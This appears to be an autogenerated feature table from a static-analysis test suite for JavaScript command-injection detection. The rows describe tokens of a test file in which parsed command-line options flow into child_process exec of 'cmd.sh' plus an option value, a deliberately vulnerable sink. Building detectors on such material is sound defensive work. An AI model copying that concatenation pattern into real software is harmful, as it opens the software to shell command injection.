autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | cp | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | require | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | this | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:119:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | 'arguments' object of anonymous function | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | exceptional return of anonymous function | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | return of anonymous function | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:119:2:130:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:13 | dashdash | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:13 | dashdash | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:13 | dashdash | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:13 | dashdash | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:13 | dashdash | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdas ... hdash') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdas ... hdash') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdas ... hdash') | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdas ... hdash') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdas ... hdash') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdash | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdash | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdash | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdash | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:6:120:35 | dashdash | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:23 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:23 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:23 | require | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:23 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:23 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | exceptional return of require('dashdash') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | exceptional return of require('dashdash') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | exceptional return of require('dashdash') | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | exceptional return of require('dashdash') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | exceptional return of require('dashdash') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | require('dashdash') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | require('dashdash') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | require('dashdash') | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | require('dashdash') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | require('dashdash') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:25:120:34 | 'dashdash' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:25:120:34 | 'dashdash' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:25:120:34 | 'dashdash' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:25:120:34 | 'dashdash' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:25:120:34 | 'dashdash' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:25:120:34 | 'dashdash' | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:25:120:34 | 'dashdash' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:25:120:34 | 'dashdash' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:9 | opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:9 | opts | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:9 | opts | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:9 | opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:9 | opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts = ... tions}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts = ... tions}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts = ... tions}) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts = ... tions}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:6:122:46 | opts = ... tions}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:20 | dashdash | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:20 | dashdash | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:20 | dashdash | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:20 | dashdash | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:20 | dashdash | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:26 | dashdash.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:26 | dashdash.parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:26 | dashdash.parse | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:26 | dashdash.parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:26 | dashdash.parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | exceptional return of dashdas ... tions}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | exceptional return of dashdas ... tions}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | exceptional return of dashdas ... tions}) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | exceptional return of dashdas ... tions}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | exceptional return of dashdas ... tions}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:22:122:26 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:22:122:26 | parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:22:122:26 | parse | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:22:122:26 | parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:22:122:26 | parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | CalleeFlexibleAccessPath | dashdash.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | calleeImports | dashdash | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:28:122:45 | {options: options} | receiverName | dashdash | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:35 | options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:35 | options | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:35 | options | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:35 | options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:35 | options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:29:122:44 | options: options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | CalleeFlexibleAccessPath | dashdash.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | InputAccessPathFromCallee | 0.options | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | assignedToPropName | options | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | calleeImports | dashdash | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:38:122:44 | options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:3 | cp | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:8 | cp.exec | contextSurroundingFunctionParameters | () | +| 